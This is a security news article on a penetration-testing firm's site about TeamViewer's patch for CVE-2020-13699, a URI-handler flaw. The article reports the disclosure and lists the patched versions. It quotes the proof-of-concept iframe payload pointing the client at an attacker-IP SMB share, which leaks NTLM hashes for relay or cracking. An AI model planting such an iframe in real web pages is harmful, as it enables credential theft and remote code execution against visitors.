fbpx
Frame-14

Privacy Ninja

        • DATA PROTECTION

        • CYBERSECURITY

        • Penetration Testing

          Secure your network against various threat points. VA starts at only S$1,000, while VAPT starts at S$4,000. With Price Beat Guarantee!

        • API Penetration Testing
        • Enhance your digital security posture with our approach that identifies and addresses vulnerabilities within your API framework, ensuring robust protection against cyber threats targeting your digital interfaces.

        • On-Prem & Cloud Network Penetration Testing
        • Boost your network’s resilience with our assessment that uncovers security gaps, so you can strengthen your defences against sophisticated cyber threats targeting your network

        • Web Penetration Testing
        • Fortify your web presence with our specialised web app penetration testing service, designed to uncover and address vulnerabilities, ensuring your website stands resilient against online threats

        • Mobile Penetration Testing
        • Strengthen your mobile ecosystem’s resilience with our in-depth penetration testing service. From applications to underlying systems, we meticulously probe for vulnerabilities

        • Cyber Hygiene Training
        • Empower your team with essential cybersecurity knowledge, covering the latest vulnerabilities, best practices, and proactive defence strategies

        • Thick Client Penetration Testing
        • Elevate your application’s security with our thorough thick client penetration testing service. From standalone desktop applications to complex client-server systems, we meticulously probe for vulnerabilities to fortify your software against potential cyber threats.

        • Source Code Review
        • Ensure the integrity and security of your codebase with our comprehensive service, meticulously analysing code quality, identifying vulnerabilities, and optimising performance for various types of applications, scripts, plugins, and more

        • Email Spoofing Prevention
        • Check if your organisation’s email is vulnerable to hackers and put a stop to it. Receive your free test today!

        • Email Phishing Excercise
        • Strengthen your defense against email threats via simulated attacks that test and educate your team on spotting malicious emails, reducing breach risks and boosting security.

        • Cyber Essentials Bundle
        • Equip your organisation with essential cyber protection through our packages, featuring quarterly breached accounts monitoring, email phishing campaigns, cyber hygiene training, and more. LAUNCHING SOON.

TeamViewer Fixes Bug That Lets Attackers Access Your PC

TeamViewer Fixes Bug That Lets Attackers Access Your PC

Popular remote access and troubleshooting app, TeamViewer has patched a vulnerability that could let attackers quietly establish a connection to your computer and further exploit the system.

When successfully exploited, this bug would let an unauthenticated, remote actor execute code on your Windows PC, or obtain password hashes (e.g., for cracking via brute-force).

Assigned CVE-2020-13699, the high severity bug falls under a special category of security vulnerabilities, dubbed Unquoted Search Path or Element (CWE-428).  These take advantage of the fact, arguments being passed to a program are not “quoted.”

This can cause a program to treat the arguments as direct commands, rather than an input value.

Using iframes and URI schemes

To execute a typical attack, a user would need to browse to a malicious page that loads an iframe in their web browser—possibly hidden or as tiny as a pixel, to evade being seen by a casual surfer.

The tiny pixel above “Latest Articles” is where the iframe resides
Source: BleepingComputer

The iframe loads itself using the “teamviewer10:” URI scheme, which tells your web browser to launch the TeamViewer application installed your machine.

Custom URI schemes are used by locally installed applications that would like to empower the user to launch them from their web browser. For example, URLs starting with “skype:” in your web browser would launch Skype. Other commonly used apps like Slack, Zoom, and Spotify use similar URI structures.

To exploit this TeamViewer flaw, the attacker would set iframe’s src attribute to ‘teamviewer10: –play \\attacker-IP\share\fake.tvs’. 

A sample CVE-2020-13699 PoC in which an almost-invisible iframe launches TeamViewer
Source: BleepingComputer

This command instructs the locally installed TeamViewer application to connect to the attacker’s server via the Server Message Block (SMB) protocol. 

“An attacker could embed a malicious iframe in a website with a crafted URL (iframe src='teamviewer10: --play \\attacker-IP\share\fake.tvs') that would launch the TeamViewer Windows desktop client and force it to open a remote SMB share,” said Jeffrey Hofmann, a security engineer at Praetorian who discovered the flaw.

Also read: 7 Client Data Protection Tips to Keep Customers Safe

No password needed

Moreover, because of how SMB shares work, and it is the victim’s machine initiating a connection to the attacker’s SMB share, the attacker does not need to know the user’s password. They’d automatically be authenticated and granted access.

“Windows will perform NTLM authentication when opening the SMB share and that request can be relayed (using a tool like responder) for code execution (or captured for hash cracking),” explained Hofmann. 

According to the engineer, multiple TeamViewer versions were impacted as evident from the URI schemes that could be used in the attack.

“This affects the URI handlers teamviewer10, teamviewer8, teamviewerapi, tvchat1, tvcontrol1, tvfiletransfer1, tvjoinv8, tvpresent1, tvsendfile1, tvsqcustomer1, tvsqsupport1, tvvideocall1, and tvvpn1.”

The fix for the flaw was rather simple. All it needed was for the input to be “quoted” so that it gets treated like a ‘value’ and not a system command by the locally installed TeamViewer app.

“This issue was remediated by quoting the parameters passed by the aforementioned URI handlers e.g. URL:teamviewer10 Protocol “C:\Program Files (x86)\TeamViewer\TeamViewer.exe” “%1″”

In a TeamViewer statement released today, the company confirmed the bug existed in multiple TeamViewer versions running on Windows and announced a patch.

“Today we are releasing some updates for TeamViewer 8 through 15, for the Windows platform. We implemented some improvements in URI handling relating to CVE 2020-13699.”

The company further thanked the security engineer for responsibly reporting the flaw.

“Thank you, Jeffrey Hofmann with Praetorian, for your professionalism and following a responsible disclosure model. We are grateful that you reached out to us and that you could confirm the fix of your findings in the latest release.”

Windows users of TeamViewer should consider upgrading to one or more patched versions, which include: 8.0.258861, 9.0.258860, 10.0.258873, 11.0.258870, 12.0.258869, 13.2.36220, 14.2.56676, 14.7.48350, and 15.8.3.

Also read: 4 easy guides to data breach assessment

0 Comments

KEEP IN TOUCH

Subscribe to our mailing list to get free tips on Data Protection and Data Privacy updates weekly!

Personal Data Protection

REPORTING DATA BREACH TO PDPC?

We have assisted numerous companies to prepare proper and accurate reports to PDPC to minimise financial penalties.
×

Hello!

Click one of our contacts below to chat on WhatsApp

× Chat with us